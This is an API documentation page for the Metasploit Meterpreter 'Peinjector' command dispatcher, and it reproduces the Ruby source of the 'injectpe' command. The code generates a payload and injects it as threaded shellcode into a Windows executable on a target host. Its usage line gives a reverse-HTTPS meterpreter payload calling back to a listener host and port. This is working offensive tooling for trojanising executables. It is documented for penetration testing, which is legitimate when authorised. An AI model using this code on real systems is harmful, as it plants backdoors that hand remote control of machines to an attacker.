Class: Rex::Post::Meterpreter::Ui::Console::CommandDispatcher::Peinjector

Inherits:
Object
  • Object
show all
Includes:
Rex::Post::Meterpreter::Ui::Console::CommandDispatcher
Defined in:
lib/rex/post/meterpreter/ui/console/command_dispatcher/peinjector.rb

Overview

Peinjector extension - inject a given shellcode into an executable file

Constant Summary collapse

Klass =
Console::CommandDispatcher::Peinjector
@@injectpe_opts =
Rex::Parser::Arguments.new(
  '-p' => [true, 'Windows Payload to inject into the target executable.'],
  '-t' => [true, 'Path of the target executable to be injected'],
  '-o' => [true, 'Comma separated list of additional options for payload if needed in \'opt1=val,opt2=val\' format.'],
  '-h' => [false, 'Help banner']
)

Instance Attribute Summary

Attributes included from Ui::Text::DispatcherShell::CommandDispatcher

#shell, #tab_complete_items

Instance Method Summary collapse

Methods included from Rex::Post::Meterpreter::Ui::Console::CommandDispatcher

check_hash, #client, #docs_dir, #filter_commands, #initialize, #log_error, #msf_loaded?, #session, set_hash, #unknown_command

Methods included from Msf::Ui::Console::CommandDispatcher::Session

#cmd_background, #cmd_background_help, #cmd_exit, #cmd_irb, #cmd_irb_help, #cmd_irb_tabs, #cmd_pry, #cmd_pry_help, #cmd_resource, #cmd_resource_help, #cmd_resource_tabs, #cmd_sessions, #cmd_sessions_help

Methods included from Ui::Text::DispatcherShell::CommandDispatcher

#cmd_help, #cmd_help_help, #cmd_help_tabs, #deprecated_cmd, #deprecated_commands, #deprecated_help, #docs_dir, #help_to_s, included, #initialize, #print, #print_error, #print_good, #print_line, #print_status, #print_warning, #tab_complete_directory, #tab_complete_filenames, #tab_complete_generic, #tab_complete_source_address, #unknown_command, #update_prompt

Instance Method Details

#cmd_injectpe(*args) ⇒ Object

Inject a given shellcode into a remote executable



54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/peinjector.rb', line 54

def cmd_injectpe(*args)
  if args.length == 0 || args.include?('-h')
   injectpe_usage
    return false
  end

  opts = {
    payload: nil,
    targetpe: nil,
    options: nil
  	}

  @@injectpe_opts.parse(args) { |opt, idx, val|
    case opt
    when '-p'
      opts[:payload] = val
    when '-t'
      opts[:targetpe] = val
    when '-o'
      opts[:options] = val
    end
  }
  payload = create_payload(opts[:payload], opts[:options])

  inject_payload(payload, opts[:targetpe])
end

#commandsObject

List of supported commands.



30
31
32
33
34
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/peinjector.rb', line 30

def commands
  {
    'injectpe'  => 'Inject a shellcode into a given executable'
  }
end

#create_payload(name, opts = "") ⇒ Object

Create a payload given a name, lhost and lport, additional options



82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/peinjector.rb', line 82

def create_payload(name, opts = "")

  pay = client.framework.payloads.create(name)
  pay.datastore['EXITFUNC'] = 'thread'
  pay.available_space = 1.gigabyte # this is to generate a proper uuid and make the payload to work with the universal handler

  if not opts.blank?
    opts.split(",").each do |o|
    opt,val = o.split("=",2)
    pay.datastore[opt] = val
    end
  end

  # Validate the options for the module
  pay.options.validate(pay.datastore)
  return pay
end

#inject_payload(pay, targetpe) ⇒ Object



100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/peinjector.rb', line 100

def inject_payload(pay, targetpe)

  begin
    print_status("Generating payload")
    raw = pay.generate
    param = {}

    if pay.arch.join == ARCH_X64
      threaded_shellcode = client.peinjector.add_thread_x64(raw)
      param[:isx64] = true
    else
      threaded_shellcode = client.peinjector.add_thread_x86(raw)
      param[:isx64] = false
    end

    param[:shellcode] = threaded_shellcode
    param[:targetpe] = targetpe
    param[:size] = threaded_shellcode.length;

    print_status("Injecting #{pay.name} into the executable #{targetpe}")
    client.peinjector.inject_shellcode(param)
    print_good("Successfully injected payload into the executable: #{targetpe}")

  rescue ::Exception => e
    print_error("Failed to Inject Payload to executable #{targetpe}!")
    print_error(e.to_s)
  end
end

#injectpe_usageObject



44
45
46
47
48
49
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/peinjector.rb', line 44

def injectpe_usage
  print_line('Usage: injectpe -p < windows/meterpreter/reverse_https > -t < c:\target_file.exe >, -o < lhost=192.168.1.123, lport=4443 >')
  print_line
  print_line('Inject a shellcode on the target executable.')
  print_line(@@injectpe_opts.usage)
end

#nameObject

Name for this dispatcher



23
24
25
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/peinjector.rb', line 23

def name
  'Peinjector'
end